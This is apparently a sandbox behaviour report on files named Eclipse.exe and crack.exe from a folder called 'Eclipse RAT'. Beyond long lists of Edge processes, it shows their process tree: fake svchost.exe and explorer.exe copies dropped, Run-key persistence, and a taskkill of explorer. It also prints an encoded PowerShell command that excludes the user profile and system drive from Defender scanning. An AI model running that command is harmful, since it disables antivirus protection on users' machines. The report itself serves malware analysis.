  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
    PID: 5152

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:1
    PID: 5160

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:1
    PID: 5168

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:1
    PID: 5176

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
    PID: 5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7976 /prefetch:12⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:12⤵PID:5200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:12⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:12⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:12⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8352 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9068 /prefetch:12⤵PID:5980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9160 /prefetch:12⤵PID:6276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9536 /prefetch:12⤵PID:6284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9932 /prefetch:12⤵PID:6760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:12⤵PID:6768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10556 /prefetch:12⤵PID:6904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10924 /prefetch:12⤵PID:7080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:12⤵PID:7092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9064 /prefetch:12⤵PID:7100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10120 /prefetch:12⤵PID:6232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:12⤵PID:6688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11188 /prefetch:12⤵PID:7076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11340 /prefetch:12⤵PID:7112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11128 /prefetch:12⤵PID:7120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12028 /prefetch:12⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12200 /prefetch:12⤵PID:7180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12204 /prefetch:12⤵PID:7280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12684 /prefetch:82⤵PID:7524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:7540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11440 /prefetch:12⤵PID:7624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11620 /prefetch:12⤵PID:7740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12592 /prefetch:12⤵PID:7812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10860 /prefetch:12⤵PID:7884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10404 /prefetch:12⤵PID:7956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8160 /prefetch:12⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10676 /prefetch:12⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:12⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10460 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1848 /prefetch:12⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:12⤵PID:7996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7552 /prefetch:12⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:7228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1124 /prefetch:12⤵PID:7680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:12⤵PID:1112
-
- C:\Windows\System32\CompPkgSrv.exe (PID 1876, depth 1)
  C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe (PID 1812, depth 1)
  C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\system32\AUDIODG.EXE (PID 5124, depth 1)
  C:\Windows\system32\AUDIODG.EXE 0x410 0x3ec
- C:\Windows\System32\rundll32.exe (PID 7116, depth 1)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Program Files\7-Zip\7zG.exe (PID 7040, depth 1)
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Eclipse RAT\" -ad -an -ai#7zMap14102:84:7zEvent31216
  signatures: Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe (PID 5480, depth 1)
  "C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"
  signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of SetWindowsHookEx
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5208, depth 2)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5412, depth 2)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAYwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZgBnACMAPgA="
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 968, depth 2)
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
  - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 4568, depth 2)
    "C:\Users\Admin\AppData\Roaming\explorer.exe"
    signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
    - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 4284, depth 3)
      "C:\Users\Admin\AppData\Roaming\explorer.exe"
      signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetWindowsHookEx
      - C:\Windows\system32\cmd.exe (PID 8164, depth 4)
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
        - C:\Windows\system32\taskkill.exe (PID 6932, depth 5)
          taskkill /f /im "explorer.exe"
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - C:\Users\Admin\explorer.exe (PID 7936, depth 5)
          "explorer.exe"
          signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
          - C:\Users\Admin\explorer.exe (PID 7724, depth 6)
            "explorer.exe"
            signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Suspicious use of SetWindowsHookEx
            - C:\Windows\system32\cmd.exe (PID 7224, depth 7)
              C:\Windows\system32\cmd.exe /c "ver"
- C:\Windows\System32\rundll32.exe (PID 3704, depth 1)
  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
- C:\Windows\explorer.exe (PID 3488, depth 1)
  C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
  signatures: Modifies Internet Explorer settings; Modifies registry class; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
  - C:\Users\Admin\Downloads\Eclipse RAT\crack.exe (PID 3844, depth 2)
    "C:\Users\Admin\Downloads\Eclipse RAT\crack.exe"
    signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of SetWindowsHookEx
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 7716, depth 3)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 8172, depth 3)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 5684, depth 3)
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
    - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 3928, depth 3)
      "C:\Users\Admin\AppData\Roaming\explorer.exe"
      signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 3204, depth 4)
        "C:\Users\Admin\AppData\Roaming\explorer.exe"
        signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Suspicious use of SetWindowsHookEx
        - C:\Windows\system32\cmd.exe (PID 5616, depth 5)
          C:\Windows\system32\cmd.exe /c "ver"
  - C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe (PID 5792, depth 2)
    "C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"
    signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of SetWindowsHookEx
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5164, depth 3)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5416, depth 3)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAYwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZgBnACMAPgA="
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 1008, depth 3)
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
    - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 1488, depth 3)
      "C:\Users\Admin\AppData\Roaming\explorer.exe"
      signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - C:\Users\Admin\AppData\Roaming\explorer.exe (PID 7388, depth 4)
        "C:\Users\Admin\AppData\Roaming\explorer.exe"
        signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Suspicious use of SetWindowsHookEx
        - C:\Windows\system32\cmd.exe (PID 5268, depth 5)
          C:\Windows\system32\cmd.exe /c "ver"
- C:\Windows\System32\rundll32.exe (PID 4104, depth 1)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
- C:\Windows\System32\rundll32.exe (PID 2784, depth 1)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  signatures: Modifies registry class
